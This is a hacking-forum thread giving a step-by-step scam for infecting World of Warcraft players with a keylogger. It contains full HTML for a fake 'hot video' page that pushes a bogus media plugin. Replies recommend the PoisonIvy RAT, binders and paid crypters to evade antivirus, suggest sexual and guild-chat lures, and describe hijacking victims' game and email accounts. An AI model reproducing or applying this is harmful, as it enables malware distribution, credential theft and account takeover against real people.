[New] The Hot Video Scam

[Mathmech]

This is a scam I invented a months back, as a prank on my friends, but know I figured out a new way to use it.

First, create a keylogger.
If you don't know how to, Google it.
I do not recommend Ardamax as virus programs go apeshit over it.

Ok, you got your keylogger?
Want to spread it?

Of course you do.

First, create a new webpage.
For the VERY VERY BASICS, just open notepad and type:

HTML Code:

<html>
<head>
<title>Loading...</title>
</head>
<body>
<b> Loading please give it a few minutes.</b> <br> 
If it takes too long make sure you have the <a href="!!!!!YOURFILELINKHERE!!!!!">Windows Media Plugin</a> installed.
<p>
<OBJECT id="aba_MediaPlayer" codeBase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701"
 type="application/x-oleobject" height="300" width="500" classid="CLSID:22D6f312-B0F6-11D0-94AB-0080C74C7E95">
<PARAM NAME="FileName" VALUE="mms://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../">

<PARAM name="autostart" VALUE="false">
<PARAM name="ShowControls" VALUE="true">
<param name="ShowStatusBar" value="true">
<PARAM name="ShowDisplay" VALUE="true">
   <embed TYPE="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"
src="mms://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../" Name="aba_MediaPlayer" AutoStart="0" Width="500"
 Height="300" ShowControls="1" ShowStatusBar="1" ShowPositionControls="1" Prebuffer="1">
   </embed>
</OBJECT>
</p>

<div style="visibility:hidden;display:none">
</div>
</body>
</html> 

Just insert that into notepad, and save as whatever file name you want, but end with .html.

So just save as "whateverlol.html"

This is as said the extreme basics, but ironically, people fall for this.

Ok, what is on this webpage you created?
Well, open it up and check it out.

You'll see a Video, and some text.
The thing with this video is that it never loads.
And since it won't load, your victims will download the "plugin".

So upload the your keylogger.
Do not use Rapidshare, megaupload, filebeam or any other uploading site that require the downloader to go through captchas and such.

You want to upload it somewhere where you get to go to the file directly.
I recommend [Only registered and activated users can see links. ] (you can host the html site here to).

And then just post the link to the HTML site anywhere you see fit.

Like, a guild forum (watch my guild pwn algalon *insert link here*)
A Chatroom (hot 22 yo girl looking for action - this is me: *insert link here)

Just post wherever you'd like.

You will get more info then just the wow account details.
But the great thing is that if you get their password, change it, and when they change back, you get their SQ/A or CDkey too ^^

As I said, if you want to, make a complete fake website, with the plugin link more subtle.

An example can be found here:
[Only registered and activated users can see links. ]
DO NOT CLICK THE PLUGIN LINK!

Your AV will go apeshit, as the link go to a ancient RAT that is widely detected. Nobody is monitoring it though, so it's not really dangerous, but still.

Hope this guide has helped someone.

[chiem]

WOW! Really nice idea!! +REP TWICE this is truly epic, I'm gonna do this to my friends just for fun lol

[Tyrune]

This is actually a great idea. If there's one thing that sells more than anything, it's sex.

[Free Hugs]

This is amazizing! Going to definately use!

[survivorman]

oh my, very very sexy

[MaxiPads]

Quote:

Originally Posted by HotlinkFiles

Hello folks

Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.

Enjoy,
Hotlinkfiles Administrator

HotlinkFiles is out of the picture if your using Ardamax...

[ZhoX]

Nice on this.

[karika]

Anyone know how or what the perfect keylogger is?

[Slagg90]

I google "how to make a keylogger", but all programs they use are "pay to use"

[c0rrupt10n]

Nice Method! I bet this will work miracles.

[[BoonDoggle]]

Maybe use PoisonIvy and bind it with EasyBinder.. if you got Junio too you can make it undetectable...

Caliga has a guide about this He rules.. everybody rep him if you download his pack or at least thank him..

I don't want to link all the noobs to his profile though.. + I don't want to re-upload it because this scam is too good to be wasted on noobs/leechers that can't do their daily searching.

[Mathmech]

If you have a little spare cash, using PoisonIvy with a FUD Crypter (costs ~10$) you have a really solid keylogger.
And you can spy on them too ^^

I recommend buying a FUD crypter (from some l33t hackzor at a hacking forum) instead of taking a public one, as public become detectable REALLY fast.

If you really want to go the extra mile, bind it with the actual WMP-Plugin and people will never know they are infected.

[Stormrage1]

I thought up a idea of how to acually get people on a certain server. Say for Ex: You play on the same server and just want a high level or two. Go in trade channel and start a stupid ass conversation about...well anything really that wow players will talk about. after awhile just say "hey look i just found this video on (what ever your talking about)."
then use this trick link the website thing and most likely some stupid person with a 80 will fall for it. Keylog them and wait for them to log out and log back in. Change there password and then keep putting in the wrong password so after awhile it will say "Too many failed login attempts) after that your on your own. try to get the toon switched to your account somehow. But most likely if the player cant login he will go to his email and since you still have him keylogged you can easily logon to his email then change his password to that and lock him out of that too. Hope this helps((:

[gtj4]

This is Great xD !!

[Mathmech]

Glad so many people find use for it.

Im just going to address the Keylogger-problem again, since i got loads of pms.

If you want undetectable - Buy (yes, pay with money - they cost like 10$) a Keylogger, then don't upload it to any online virus scanner (virustotal etc) because they send any information they get to the AV companies.

Then bind it to the official WMPplugin - found [Only registered and activated users can see links. ] (or any other file of your liking) so that when he downloads it it will look legit.

Of course plugins never work like they should, so when the movie doesn't work, he shouldn't be too suspicious.

Then wait for your profits.

Have fun with your new scammed accounts.